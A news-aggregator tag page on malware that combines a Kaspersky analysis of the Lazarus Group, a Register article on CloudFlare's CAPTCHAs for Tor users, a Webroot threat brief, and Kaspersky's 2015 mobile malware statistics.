Home Tags Malicious Software

Tag: Malicious Software

Malware, short for malicious software, is any software used to disrupt computer operations, gather sensitive information, gain access to private computer systems, or display unwanted advertising. Malicious software was called computer virus before the term malware was coined in 1990 by Yisrael Radai. The first category of malware propagation concerns parasitic software fragments that attach themselves to some existing executable content. The fragment may be machine code that infects some existing application, utility, or system program, or even the code used to boot a computer system. Malware is defined by its malicious intent, acting against the requirements of the computer user, and does not include software that causes unintentional harm due to some deficiency.

Malware may be stealthy, intended to steal information or spy on computer users for an extended period without their knowledge, as for example Regin, or it may be designed to cause harm, often as sabotage (e.g., Stuxnet), or to extort payment (CryptoLocker). ‘Malware’ is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruseswormstrojan horsesransomwarespywareadwarescareware, and other malicious programs. It can take the form of executable code, scripts, active content, and other software. Malware is often disguised as, or embedded in, non-malicious files. As of 2011 the majority of active malware threats were worms or trojans rather than viruses.

Operation Blockbuster revealed

Kaspersky Lab has joined industry alliance driven by Novetta to announce Operation Blockbuster. Just like the previous Operation SMN, this alliance brings together key players in the IT security industry, working together in an effort to disrupt and neutralize multiple cyberespionage campaigns that have been active for several years. Some of the targets of these campaigns included financial institutions, media houses and manufacturing companies, among others. In the past, we published our research into the malware that was publicly attributed to the Sony Pictures (SPE) hack.

Building on that data, Kaspersky Lab conducted more focused research into a cluster of related campaigns stretching back several years before the SPE incident.

That cluster involves several malware families as well as campaigns that have not received media attention and were previously considered unrelated.

By focusing primarily on instances of code-reuse and leveraging the power of Yara, Kaspersky researchers were able to proactively spot new malware variants produced by the same threat actor, codenamed by Novetta ‘The Lazarus Group’.

For instance, past and current activity that we attribute to the Lazarus Group includes Wild Positron, which is also known publicly as Duuzer. Some of our findings about Wild Positron and other associated operations were initially presented to a select audience at our Security Analyst Summit (SAS) in Tenerife, Spain, through a joint presentation between researchers from Kaspersky’s Global Research and Analysis Team and AlienVault Labs’ Research Team.

Today, as part of Operation Blockbuster, together with Novetta and other industry partners, we are publishing our findings for the benefit of the wider public. Technical highlights of SAS findings The Lazarus Group’s activity spans multiple years, going back as far as 2009. However, their activity spikes starting with 2011.

The group deployed multiple malware families throughout the years, including malware associated with Operation Troy and DarkSeoul, the Hangman malware (2014-2015) and Wild Positron / Duuzer (2015).

The group is known for spearphishing attacks, which include CVE-2015-6585, which was a zero-day vulnerability at the time of discovery. During our analysis of the malware from the SPE attack as well as the connected malware families mentioned above, we observed certain specific traits shared between samples used in separate attacks.
In general, such similarities are instances of code sharing and indicate the existence of a relationship between the malware families, which can be used to paint a more complete picture of a threat actor. We describe some of these overlapping features below. Network functionality Rather than focus on the specific functionality of any given piece of malware, we focused on hunting for as many related malware as possible in order to better understand the practices of this threat actor. Studying multiple coding quirks within any given malware variant actually revealed these to be coding conventions implemented across both different malware families as well as entirely new samples.

A simple example of code reuse is the networking functionality that includes a half-dozen hard-coded user-agents with the misspelling ‘Mozillar’ instead of Mozilla. Misspelled Hardcoded User-Agent This same user-agent appears across a variety of malware families including the original Destover as well as multiple loosely related variants of Hangman, a new campaign targeting Domain Controllers, and the Sconlog/SSPPMID samples. Self-deleting scripts Placeholder strings in the dropper (left) and the resulting self-delete bat file (right) Another interesting convention is the use of BAT files to delete components of the malware after infection.

These BAT files are generated on the fly and, while they serve their purpose of eliminating initial infection traces, they ironically double as a great way to identify the malware itself by honing in on the path-placeholder strings that generate the randomly-named BAT files on the infected systems.

This convention is found across the widest berth of Hangman/Volgmer variants as well as a wealth of thus-far uncategorized samples from stretching from as far back as 2012/2013. Basic anti-analysis techniques Password-protected ZIP resource containing malware payload A high-confidence indicator of correlation is the reuse of a shared password across malware droppers used to drop different malware variants.

The droppers all kept their payloads within a password-protected ZIP under the resource name ‘MYRES’.

The dropper contains the hardcoded password ‘!1234567890 dghtdhtrhgfjnui$%^^&fdt‘ making it trivially easy for an analyst to reach the payload.

The purpose, of course, is not to stymie seasoned analysts but to halt automated systems from extracting and analyzing the payload. Avid watchers Hardcoded sandbox hostnames in latest iterations of the Lazarus Group malware The target of this investigation is far from unaware of the efforts of security practitioners and AV vendors interested in their practices.

Apart from including simple anti-analysis techniques, the Lazarus group’s latest malware now include a custom-tailored list of computer hostnames to watch out for.

These hostnames belong to sandbox execution systems likely commonly executing their malware for the sake of generating detections. List of sandbox names have been made available on attacker forums or open blog posts.

The interesting thing is that the Lazarus group’s list of sandbox hostnames includes the following: ‘XELRCUZ-AZ’ ‘RATS-PC’ ‘PXE472179’ These are three presumed sandbox hostnames unavailable in any public lists we’ve been able to identify.

The attackers most likely collected these during the execution of their malware and decided to retaliate by adding logic to avoid execution on these systems.

This displays a level of awareness of an attacker that is cognizant of the playing field and adapting to outwit their adversaries in the security industry. Attacker activity Profiling the PE compilation timestamps can provide security researchers with a method to identify the attacker’s activity throughout the years.

This can be used to understand if the group’s efforts are increasing, decreasing or if certain blind spots exist. Based on the analysis of several samples that we strongly associated with the group, we conclude the activity has been steadily growing since 2013. Analysis of the working hours provide a possibly even more interesting pictures: The group appears to start working around midnight (00 hrs GMT) and breaks for lunch around 3am GMT.

Considering normal working hours, this indicates the attackers are probably located on a timezone of GMT+8 or GMT+9. What is perhaps most surprising is the amount of sleep they get – which is roughly about 6-7 hours per night.

This indicates a very hard working team, possibly more hard working than any other APT group we’ve analysed. Language usage and attribution Of course, one of the top questions here is who is behind the Lazarus group and is it a nation-state sponsored attacker? Instead of speculating on the origin of these attacks, we prefer to provide technical facts and let the reader draw their own conclusions. Out of the Lazarus group reference sample set compiled by our partner Novetta, just over 60% (61.9%) of them have at least one PE resource with Korean locale or language. The analysis of the metadata extracted from several thousand samples shown above seems to indicate the attackers are probably located on a timezone of GMT+8 or GMT+9. Additionally, many of the attacks in the past seemed to target institutions in South Korea, such as in the case of DarkSeoul.

Coupled with the usage of a Hangul Word Processor zero-day by the attackers also seems to indicate that South Korea is one of their top interests. Victim information Based on KSN analysis and reports, we were able to put together a map with the most affected regions and countries by the Lazarus group malware.

To create the map, we took the reference samples set from Novetta, removed the shared hacking tools (such as Process Hacker) and cross referenced them with KSN detections from the last twelve months.
It should be noted that due to the large amount of samples (more than 1000), these detections can include researchers analysing the malware as well as multi-scanners or victims connecting by VPNs.

Additionally, for such a large number of samples and detections, the geography can be influenced by the geographical popularity/distribution of Kaspersky Lab products; for instance, while many of the Lazarus group attacks were directed at targets in South Korea, our customer base there is relatively small and doesn’t offer a solid perspective on the infections there. Finally, some of the malware from the Lazarus group appears to be self-spreading (worms) which affect the overall statistics if we look at it from a targeted attacks point of view. Nevertheless, these statistics provide an overall image of Lazarus group malware detections as observed by our products over the last 12 months. Conclusions Our research into the Lazarus group conducted over the past several years confirms the existence of a connection between various campaigns such as Operation DarkSeoul, Operation Troy and the SPE, which we believe to be fitting under the umbrella of a single threat actor.

Their focus, victimology, and guerilla-style tactics indicate a dynamic, agile and highly malicious entity, open to data destruction in addition to conventional cyberespionage operations. During the last two years, the number of destructive attacks has grown considerably. We’ve written about some of them in our blog ‘Five Wipers in the Spotlight‘.

As observed in these incidents, this kind of malware proves to be a highly effective type of cyber-weapon.

The power to wipe thousands of computers at the push of a button represents a significant bounty to a CNE team tasked with disinformation and the disruption of a target enterprise.
Its value as part of hybrid warfare, where wiper attacks are coupled with kinetic attacks to paralyze a country’s infrastructure remains an interesting thought experiment closer to reality than we can be comfortable with. As we predicted, the number of wiper attacks grows steadily.
It will continue to rise exponentially as media and governments respond in a way that raises the profile of the perpetrators in a politically beneficial manner. Millions of dollars in losses, disabled operational capabilities, and reputational loss will continue to haunt the victims in the wake of the Lazarus group and other actors willing to perpetrate these devastating attacks. Together with our industry partners, we are proud to put a dent in the operations an unscrupulous actor willing to leverage these devastating techniques. Kaspersky PR pageNovetta PR page Indicators of Compromise (IOCs) Novetta has put together a website with IOCs and Yara rules related to the Lazarus group. You can grab them here: IndicatorsSTIX file (This file provided courtesy of CERT Australia www.cert.gov.au)YARA signaturesLarge CSV of Family Hashes
Bar to 'malicious attack traffic' may be lowered Tor users crying over CloudFlare's CAPTCHAs will soon be able to put away their onions, the company has suggested. CloudFlare's CEO, Matthew Prince, told The Register that he would love to create a no-more-tears system allowing the network's legitimate users to access websites without being hit by buggy Turing tests, while also protecting his customers' sites from abuse. Tor, which allows individuals to use the internet without spaffing identifying information at the TCP/IP level, is highly prized by privacy activists.
It unfortunately also provides miscreants with a valuable layer of protection, with their use of it allegedly accounting for more than 90 per cent of the network's traffic. While definitive figures on the degree to which the network is used abusively are unavailable, its supporters have complained that CloudFlare – which provides CDN and/or DNS services for over a million websites – has allowed those customers to implement CAPTCHAs which are purposefully designed to hamper Tor users' anonymous access to the web. CloudFlare has always denied this.

An FAQ on its support site states that the company “does not actively block visitors who use the Tor network.” It adds, however, that “due to the behaviour of some individuals using the Tor network (spammers, distributors of malware, attackers, etc.), the IP addresses of Tor exit nodes generally earn a bad reputation.” As such, CloudFlare's basic protection level – which is set by customers – issues “CAPTCHA-based challenges to visitors whose IP address has a high threat score.” Prince told The Register: “You have to acknowledge the complaints that Tor users have.
It's made browsing the internet much more difficult for Tor users, and we hate that.” The CEO is not alone in hating it.

A bug tracker ticket opened yesterday by one of the Tor project's most well-known evangelists, Jacob Appelbaum, alleged that companies such as CloudFlare “are effectively now Global Active Adversaries.” CloudFlare, according to Appelbaum, “actively make it nearly impossible to browse to certain websites, they collude with larger surveillance companies (like Google), their CAPTCHAs are awful, they block members of our community on social media rather than engaging with them and frankly, they run untrusted code in millions of browsers on the web for questionable security gains.” Comments in the Tor Project's trac page, however, show that Appelbaum is not alone in his criticism.
Vituperative members of the Tor community declared their dislike of CloudFlare in the thread, saying that it gathers metrics which "count as a kind of surveillance that is seemingly linked with a PRISM provider," as Appelbaum described CloudFlare's use of Google's CAPTCHAs. Prince denied this to The Register, saying: “If you sat at CloudFlare and listened to how much we're supportive of communities like Tor internally, it's hard to make that same claim.” The CEO also disagreed with another of Appelbaum's allegations – that the company isn't interested in engaging in a dialogue with the Tor project – though he stressed his respect for Appelbaum himself, whom he regards as “a very smart guy.” “Our customers are website owners,” Prince added, “and if you survey them ask what they think about Tor, they would rather just block it in most cases.

The reason why is because an enormous amount of abuse comes via Tor.” According to Prince, third-party figures have suggested than more than 90 per cent of Tor traffic – in voluminous terms – “is, in some way, per se abusive, and I don't mean that in terms of visiting distasteful sites, that's not our business, but is traffic that is actively trying to hurt the websites it is visiting.” CloudFlare's CTO responded to Appelbaum's “Global Active Adversary” claim, criticising it for being an “inflammatory introduction” before clarifying that CloudFlare is "not adversarial to TOR as an entity, we are trying to deal with abuse that uses the TOR network.” Malicious traffic arriving via a Tor exit node is indistinguishable from legitimate traffic, as those using the Tor Browser Bundle share the exact same user agent and IP range.

The alternative to a CAPTCHA providing a small Turing test to visitors to distinguish humans from email-address-scraping bots. Concurring with Prince's comments about engaging with the Tor Project, the CTO asserted that the company has had “multiple contacts with people working on Tor through events like Real World Crypto and have been trying to come up with a solution that will protect web sites from malicious use of Tor while protecting the anonymity of Tor users (such as myself).” Prince also told El Reg that his company offered "six or seven" of its 125 engineers to work with the Tor project.

Among the active Tor users at the company are the CTO, and Ryan Lackey, known for previously founding the Sultanate of Kinakuta-like Sealand-based HavenCo and joining CloudFlare when his company, CryptoSeal, was acquired in 2014, as well as “at least 20 others.” "About a month ago, I blacklisted every single IP address that was used in the CloudFlare office network, so our own team had to pass the CAPTCHAs too, so we had to feel the same pain, and it is a pain in the ass," added Prince. There have been bugs in the CAPTCHA system too, Prince added, forcing Tor users to have to pass the CAPTCHA more than once per site. "We just see a tonne of abuse coming from those IP addresses," said Prince, "and our system says it's statistically probable that this is abusive." CloudFlare is working on making things easier, however.

The CEO told us that, "for first time, we're allowing our customers to apply their own rules to Tor exit nodes." The company will soon allow customers to whitelist Tor exit nodes. "What I worry about," said Prince, "was that I could not think of a philosophically justifiable reason to allow the whitelisting Tor exit nodes and not the blacklising of Tor exit nodes. We are just allowing customers to whitelist them, but I think a majority of site owners would rather blacklist them." I was at a hosting conference recently and somebody stood up and said, “I want to ask you something specifically about Tor” and somebody from the EFF stood up and said it was my question too.

And then the person asked “When will you allow us to block Tor entirely?” and the EFF guy was like “Wow, I never appreciated how much malicious stuff the average website owner sees coming off of the network.” The Tor Project does not explicitly accept that it facilitates additional abuse.
Its Abuse FAQ repeatedly states variations on the theme of: "So yes, criminals could in theory use Tor, but they already have better options, and it seems unlikely that taking Tor away from the world will stop them from doing their bad things.

At the same time, Tor and other privacy measures can fight identity theft, physical crimes like stalking, and so on." Prince agreed with the principle that Tor was a legitimate service and said that the company has "tried to feel the pain of those users too. We're trying to be as empathetic as possible to those challenges.

But our customers are saying something else." "If there's a technical way to do it, we're interested," said Prince, regarding a means of enabling the legitimate use of Tor while protecting customers. He suggested moving "the proof-of-work problem to their side" might help. “I'd love to be able to work with the Tor community to come up with one solution,” added Prince. Potential solutions are being debated by the Tor community on the trac page. ® Disclosure The Register is a CloudFlare customer. Our security settings require CAPTCHAs be completed by those coming from “possibly malicious IP ranges” for the reasons stated above. While we apologise for any inconvenience this causes, it remains a useful security mechanism. Sponsored: DevOps: hidden risks and how to achieve results
Nearly 97 percent of malware encountered on users' computers is unique, as criminals automatically generate variants in order to stymie defensive software. Every snowflake may be unique, but now, so is nearly every piece of malware, according to the latest report by security firm Webroot.Last year, 97 percent of malware encountered by potential victims was a unique variant, the culmination of a trend that started more than a half decade ago, the company stated in its Webroot 2016 Threat Brief. While no antivirus company relies only on signatures—also known as "hashes"—to detect malware, slightly modifying the malicious programs to foil the first line of defense is an easy step for attackers, Grayson Milbourne, security intelligence director for Webroot, told eWEEK."From a hash perspective, each of those threats are unique to that particular endpoint," he said. "Those threats were only seen on the endpoint that recorded it."Overall, the amount of malware seen by end users appears to be leveling off. Webroot detected only a slight increase in malware as a proportion of all unique files executed by its users.

The number of potentially unwanted software programs blocked by Webroot, however, declined by almost half.
In part, the drop is likely due to efforts by the Clean Software Alliance, a group dedicated to preventing unwanted software installs. "Because of the Clean Software Alliance, companies are doing a better job of leading people toward the legitimate source [of a desired program]," he said. "So the bad acting, pay-per-install groups are realizing that, if they are going to thrive, they have to act more like malware and evade detection. We see them using the same techniques now as most malware." Webroot, however, saw a dramatic increase in the number of new Internet addresses from which malicious attacks came. On average, nearly 100,000 new Internet addresses showed signs of malicious behavior each day, making up about 40 percent of the 250,000 addresses showing daily signs of malicious activity, Milbourne said."There is an increased migration into the unused, and otherwise thought-to-be-benign, IP space, which is a reaction by cyber-criminals as they try to stay ahead of Web companies," he said.The trend appears to be a sign that criminals are moving away from using the same sites and systems for malicious activity.
In 2014, Webroot detected malicious activity 46 times from the average IP address on its top 10,000 list of malicious actors.
In 2015, the frequency dropped to 18 times a year, Milbourne said."We track the top 10,000 IP addresses and how often we see malicious activity there," he said. "We have seen a drop in the number of times we see malicious activity from those addresses."Many of the sites are used as a destination for phishing victims. Webroot found that phishing attacks were twice as likely to masquerade as a technology company than as a financial firm.

Google, Dropbox and Yahoo topped the list of technology firms whose credentials attackers sought, Milbourne said."You would think that financial would be the target, but the technology companies provide more net value because if I can break into your email account at Google, I can then figure out what value you have," he said.
Hewlett Packard Enterprise (HPE) released its 2016 Cyber Risk Report on Feb. 17, providing statistics and some analysis on security trends for the past year. While some things have changed over the course of the last year, many others have not.

Among t...
EnlargeZuzu In February 2014, thousands of Asus router owners found a disturbing text file saved to their devices. "This is an automated message being sent out to everyone effected [sic]," the message read. "Your Asus router (and your documents) can b...

Mobile malware evolution 2015

The year in figures In 2015, Kaspersky Lab detected the following: 2,961,727 malicious installation packages 884,774 new malicious mobile programs – a threefold increase from the previous year 7,030 mobile banking Trojans Trends of the year Rise in the number of malicious attachments the user is unable to delete. Cybercriminals actively using phishing windows to conceal legitimate apps. Growth in the volume of ransomware. Programs using super-user rights to display aggressive advertising. Increase in the quantity of malware for iOS. Main methods of monetization Mobile malware continues to evolve towards monetization, with malware authors trying to ensure their creations are capable of making money from their victims. Stealing money from user bank accounts Mobile Trojans targeting user bank accounts continue to develop – in 2015, we detected 7,030 new mobile banking Trojans. Some malicious mobile programs work in combination with Windows-based Trojans to capture mTAN passwords (one-time passwords used in two-factor authentication) that are used for authorizing bank transactions. Many of the other mobile programs used to steal money from user bank accounts operate independently. Some mobile malware is capable of overlaying the on-screen display of a legitimate banking app with that of a phishing window that imitates the app.

The most notable examples of this type of program are Trojan Trojan-SMS.AndroidOS.OpFake.cc and the representatives of the Trojan-Banker.AndroidOS.Acecard family. One of the OpFake.cc modifications can imitate the interface of more than 100 legitimate banking and finance apps.

The Acecard family can imitate at least 30 banking apps and also has functionality to overlay any app that the C&C server commands. In Q2 2015, we wrote about Trojan-Spy.AndroidOS.SmsThief.fc whose malicious code was embedded in a legitimate banking app without affecting its performance.

This meant it was highly unlikely a user would notice the malware. The authors of mobile malware are taking an increasingly integrated approach to stealing money: it is no longer limited to special banking Trojans targeting banking apps. An example of this approach is Trojan-SMS.AndroidOS.FakeInst.ep. What the users see is a message, purportedly from Google, demanding that they open Google Wallet and go through an ‘identification’ procedure that involves entering their credit card details (one of the reasons given is the need to combat cybercrime).

The window cannot be removed until the victim enters their credit card details. Once users enter the required data, it is sent to attackers, and the window closes. Meanwhile, the Trojan continues to steal information and send additional information to its owners about the smartphone and its user. Against a background of slowing growth in the number of specialized banking Trojans, the total number of apps that can steal money from users is growing.

This comes at a time when banking Trojans are becoming more sophisticated and versatile – they are often capable of attacking customers of dozens of banks located in a variety of countries.

This means cybercriminals do not need lots of different files to attack the customers of different banks. Ransomware The amount of Trojan-Ransom families doubled in 2015 compared to the previous year, while the number of detected modifications increased 3.5 times.

This means some criminals are switching to ransomware to steal money, and those who were already doing so are continuing to create new versions of the malware. Yet another key indicator confirming the importance of this class of threat is the number of people who were attacked: in 2015, this figure increased fivefold. In most cases when these Trojans block a device, the user is accused of committing some alleged misdemeanor, and has to pay to unblock the device – the ransom can range from $12 to $100.

The blocked device is rendered inoperable – the user only sees a window with the ransom demand. Some Trojans are capable of overlaying system dialog boxes, including those used to switch off the phone. The window opened by Fusob At the end of the year we detected several Trojan downloaders that downloaded Trojan-Ransom.AndroidOS.Pletor in the system.

These Trojan downloaders exploit vulnerabilities in the system to gain super-user privileges on the device and install Trojan-Ransom malware in the system folder. Once installed, this Trojan is almost impossible to remove. SMS Trojans remained a serious threat, particularly in Russia.

These programs send paid text messages from an infected device without the user being aware.

Although their share in the overall flow of mobile threats continues to decline, the number of SMS Trojans in absolute terms remains substantial. Some SMS Trojans are not limited to the sending of text messages to premium numbers; they can also connect the user to paid subscriptions.
In 2015, we kept track of how Trojan-SMS.AndroidOS.Podec – still one of the most popular Trojans among cybercriminals – was developing.

This Trojan boasts an unusual feature: its main method of monetization is paid subscriptions.
It is capable of bypassing Captcha, and its latest modifications have “lost” the ability to send text messages as its creators have focused on subscriptions. Aggressive advertising In 2015, we recorded an increase in the number of programs that use advertising as the main means of monetization.

The trend of the year was Trojans using super-user privileges.
In the first quarter of 2015, the mobile malware TOP 20 contained just one Trojan of this type; by the end of the year they made up more than half of the rating.

Despite the fact that these Trojans are designed to download and install advertising applications without the user’s knowledge, they can cause a lot of problems. Once installed, they try to root the device and install their own components in the system making them difficult to remove. Some of them remain on a smartphone even after resetting to factory settings.

As a result, the user is inundated with annoying ads on the device.

They can also install lots of other programs, including malware, on the device without the user being aware.

There have been cases of this type of program being distributed in the official firmware of devices or being pre-installed on new phones. Malware in official stores In early October 2015 we came across several Trojans in the official Google Play Store that stole user passwords from the Russian social network VKontakte.

These were Trojan-PSW.AndroidOS.MyVk.a and Trojan-PSW.AndroidOS.Vkezo.a.

About a month later we detected a new modification of the Trojan Vkezo which was also distributed via Google Play Store.

The attackers published these Trojans 10 times in the official app store under different names over a period of several months.

The number of downloads for all versions of these Trojans was put at between 100 000 and 500 000. Yet another Trojan detected in Google Play Store was Trojan-Downloader.AndroidOS.Leech; it was also downloaded between 100 000 and 500 000 times. Malware for iOS In 2015, the number of malicious programs for iOS increased 2.1 times compared to 2014. The recent emergence of malicious apps in the App Store once again demonstrated that, contrary to popular belief, iOS is not invulnerable to malware.

The attackers did not hack App Store, but instead posted a malicious version of Apple’s Xcode, a free set of tools that developers use to create applications for iOS, on the Internet. Apple’s Xcode is officially distributed by Apple, but it is unofficially spread by third parties. Some Chinese vendors prefer to download the development tools from local servers. Someone posted an Xcode version containing malicious XcodeGhost on a third-party server in China. Malicious code is embedded in any application compiled using this version of Xcode. XcodeGhost infected dozens of applications.
Initially it was thought that 39 infected apps had bypassed the Apple testing procedure and had been successfully downloaded to the App Store.

The most popular of them was WeChat, a free messenger installed on more than 700 million user devices.

Apple removed the infected apps. However, the hacked version of Xcode was available for about six months, so the total number of infected applications might be much higher, not least because the source code for XcodeGhost was published on Github. In early June, Trojan.IphoneOS.FakeTimer.a, a malicious program for iPhone, was detected.

The Trojan targets users in Japan and can be installed on any iPhone because the attackers used an enterprise certificate to sign the Trojan.

The malicious program uses phishing techniques to steal money.

A similar version of the Trojan for Android – Trojan.AndroidOS.FakeTimer.a.that – has already been around for several years. Statistics In 2015, the volume of mobile malware continued to grow.

From 2004 to 2013 we detected nearly 200,000 samples of malicious mobile code.
In 2014 there were 295,539 new programs, while the number was 884,774 in 2015.

These figures do not tell the whole story because each malware sample has several installation packages: in 2015, we detected 2,961,727 malicious installation packages. From the beginning of January till the end of December 2015, Kaspersky Lab registered nearly 17 million attacks by malicious mobile software and protected 2,634,967 unique users of Android-based devices. The number of attacks blocked by Kaspersky Lab solutions, 2015 The number of users protected by Kaspersky Lab solutions, 2015 Geography of mobile threats Attacks by malicious mobile software were recorded in more than 200 countries. The geography of mobile threats by number of attacked users, 2015 The number of recorded attacks greatly depends on the number of users in a country.

To evaluate the danger of infection by mobile malware in various countries we calculated the percentage of our users who encountered malicious applications in 2015. TOP 10 countries by the percentage of attacked users Country % of attacked users* 1 China 37 2 Nigeria 37 3 Syria 26 4 Malaysia 24 5 Ivory Coast 23 6 Vietnam 22 7 Iran 21 8 Russia 21 9 Indonesia 19 10 Ukraine 19 * We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.** The percentage of attacked unique users as a percentage of all users of Kaspersky Lab mobile security products in the country China and Nigeria topped the ranking, with 37% of users of Kaspersky Lab mobile security products in those countries encountering a mobile threat at least once during the year. Most of the attacks on users in Nigeria were carried out by advertising Trojans such as the Ztrorg, Leech, and Rootnik families that make use of super-user privileges, as well as by adware. In China, a significant proportion of the attacks also involved advertising Trojans, but the majority of users encountered the RiskTool.AndroidOS.SMSreg family.

Careless use of these programs can lead to money being withdrawn from a mobile account. Types of mobile malware Over the reporting period, the number of new AdWare and RiskTool files detected grew significantly.

As a result, their share in the distribution of new mobile malware by type also increased noticeably – from 19.6% and 18.4% to 41.4% and 27.4%, respectively. Distribution of new mobile malware by type in 2014 and 2015 When distributing adware programs, rather primitive methods are used to attract the attention of users to the advertisements: apps are created using the icons and names of popular games or useful programs. Of course, there are lots of popular games and legitimate applications, so a lot of fake advertising apps can be generated.

The more fake applications that are used, the more effective the monetization of click activity is. Yet another way of distributing adware is by embedding an advertising module in a legitimate application.

This can be done by the author of the application as well as by those who want to make money by exploiting an app’s popularity: when the advertising module is embedded in a clean app without the author’s knowledge, the profits from advertising go to those who added the advert, not the author. Unlike fake apps, this complex app contains some useful functionality. The growth in the volume of adware is caused by the increasing competition among developers of these programs.

The legitimate programs that use various advertising modules are often too aggressive.
Increasingly, advertising modules are delivering as much advertising as possible to the user in a variety of ways, including the installation of new adware programs. Sometimes the adware programs installed on a device can make it almost impossible to use because the user is constantly fighting with advertising windows. RiskTool programs are especially popular in China.

This is because SMS payments for content are very popular in the country.

Almost any game that includes so-called internal purchases (for additional levels of a game, for example) contains an SMS payment module.
In most cases, the user is notified about the potential risks associated with such purchases, but we also consider it necessary to inform our users about the risks.

Because the games in question are popular, the number of RiskTool applications is constantly increasing.

The main contributor to that growth was the RiskTool.AndroidOS.SMSReg family of programs. Although AdWare and RiskTool programs do not cause direct harm to users, they can be very irritating, while RiskTool programs installed on mobile devices can lead to financial losses if used carelessly or manipulated by a cybercriminal. The proportion of SMS Trojans in the overall flow of mobile threats decreased almost 2.4 times – from 20.5% to 8.7%. However, in 2015 we detected even more new SMS Trojans than in 2014.

Activity by this type of malicious program dropped drastically in mid-2014.

This was the result of an AoC (Advice-of-Charge) system being introduced by Russian operators that led to a reduction in the number of so-called affiliate programs distributing SMS Trojans, the majority of which targeted users in Russia. Top 20 malicious mobile programs Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare. Name % of all attacked users* 1 DangerousObject.Multi.Generic 44.2 2 Trojan-SMS.AndroidOS.Podec.a 11.2 3 Trojan-Downloader.AndroidOS.Leech.a 8.0 4 Trojan.AndroidOS.Ztorg.a 7.6 5 Trojan.AndroidOS.Rootnik.d 6.9 6 Exploit.AndroidOS.Lotoor.be 6.1 7 Trojan-SMS.AndroidOS.OpFake.a 5.6 8 Trojan-Spy.AndroidOS.Agent.el 4.0 9 Trojan.AndroidOS.Guerrilla.a 3.7 10 Trojan.AndroidOS.Mobtes.b 3.6 11 Trojan-Dropper.AndroidOS.Gorpo.a 3.6 12 Trojan.AndroidOS.Rootnik.a 3.5 13 Trojan.AndroidOS.Fadeb.a 3.2 14 Trojan.AndroidOS.Ztorg.pac 2.8 15 Backdoor.AndroidOS.Obad.f 2.7 16 Backdoor.AndroidOS.Ztorg.c 2.2 17 Exploit.AndroidOS.Lotoor.a 2.2 18 Backdoor.AndroidOS.Ztorg.a 2.0 19 Trojan-Ransom.AndroidOS.Small.o 1.9 20 Trojan.AndroidOS.Guerrilla.b 1.8 * Percentage of users attacked by the malware in question, relative to all users attacked First place is occupied by DangerousObject.Multi.Generic (44.2%), used in malicious programs detected by cloud technologies.

Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object.

This is basically how the very latest malware is detected. Trojan-SMS.AndroidOS.Stealer.a, which was the TOP 20 leader in 2014, came 28th in 2015. Four places in the TOP 20 are occupied by Trojans that steal money from mobile or bank accounts as their main method of monetization.

They are Trojan-SMS.AndroidOS.Podec.a, Trojan-SMS.AndroidOS.OpFake.a, Trojan.AndroidOS.Mobtes.b and Backdoor.AndroidOS.Obad.f.

Trojan-SMS.AndroidOS.Podec.a (11.2%) is in second place.

This Trojan remained among the top three most popular mobile threats throughout 2015.

To recap, the latest versions of this Trojan no longer send paid text messages.

The Trojan is now fully focused on paid subscriptions, making use of CAPTCHA recognition.

Trojan-SMS.AndroidOS.OpFake.a (5.6%) in 7th place is another long-term resident of the TOP 20.
In 2014 it finished in 8th place and remained in the rating throughout all of 2015. Yet another Trojan – Trojan-Ransom.AndroidOS.Small.o (1.9%) – blocks the victim’s phone and extorts money to unblock it.

This mobile Trojan-Ransom program was very popular at the end of 2015 and became the only ransomware program to make the TOP 20.
It first appeared in the ranking in the third quarter of 2015 in 11th place; it came 19th in the overall TOP 20 for 2015.

The Trojan mostly spreads as a porn video player and targets Russian-speaking audiences. More than half (12 out of 20) of the entries in the ranking are Trojans that use aggressive advertising as their primary means of monetization.

They are Trojan-Downloader.AndroidOS.Leech.a, Trojan-Spy.AndroidOS.Agent.el, Trojan-Dropper.AndroidOS.Gorpo.a, Trojan.AndroidOS.Fadeb.a, and two modifications each of Trojan.AndroidOS.Guerrilla, Trojan.AndroidOS.Rootnik, Trojan.AndroidOS.Ztorg and Backdoor.AndroidOS.Ztorg. Unlike the usual advertising modules, these programs do not contain any useful functionality.

Their goal is to deliver as many adverts as possible to the recipient using a variety of methods, including the installation of new advertising programs.

These Trojans can use super-user privileges to conceal their presence in the system folder, from where it will be very difficult to dislodge them. We have come across such Trojans before, mostly in China.

There was a burst of activity by these programs in 2015: most of them targeting users in China, although these Trojans have started being actively distributed worldwide.

The code of the Trojans often contained the word oversea. The other two places in the TOP 20 are occupied by Exploit.AndroidOS.Lotoor modifications used to obtain local super-user privileges. Mobile banking Trojans In 2015, we detected 7,030 mobile banking Trojans, which is 2.6 times less than in 2014 when 16,586 were detected.
It should be noted that although the number of new malware programs fell from the previous year, these programs have become more adept and malign, and the areas of interest among cybercriminals now includes banks in numerous countries. Many mobile banking Trojans act independently, without any computer component, and target customers of dozens of banks around the world. Number of mobile banking Trojans detected by Kaspersky Lab solutions in 2015 56,194 users were attacked by mobile banking Trojans at least once during the year. Geography of mobile bankers The number of attacked countries is growing: attacks by mobile banking Trojan were registered in 137 countries and territories worldwide vs 90 countries in 2014. Geography of mobile banking threats in 2015 (number of users attacked) Top 10 countries attacked by mobile banking Trojans (ranked by number of users attacked): Country Number of users attacked 1 Russia 45690 2 Germany 1532 3 Ukraine 1206 4 US 967 5 Kazakhstan 804 6 Australia 614 7 South Korea 527 8 France 404 9 Belarus 380 10 Poland 324 As in the previous year, Russia topped the rating of countries attacked by mobile banking Trojans.

Among the newcomers were South Korea, Australia, France and Poland. Lithuania, Azerbaijan, Bulgaria and Uzbekistan left the TOP 10. Just how popular mobile banking Trojans are with cybercriminals in each country can be shown by the percentage of users who were attacked by these Trojans during the reporting period, relative to all attacked users. TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users Country % of all attacked users* 1 South Korea 13.8 2 Australia 8.9 3 Russia 5.1 4 Austria 3.0 5 Belarus 1.9 6 US 1.8 7 Tajikistan 1.7 8 Ukraine 1.6 9 France 1.6 10 Uzbekistan 1.6 * Percentage of users attacked by mobile banking Trojans, relative to all attacked users of Kaspersky Lab’s mobile security products in the country. A substantial portion of mobile banking attacks in South Korea were caused by representatives of the Trojan-Banker.AndroidOS.Wroba family.

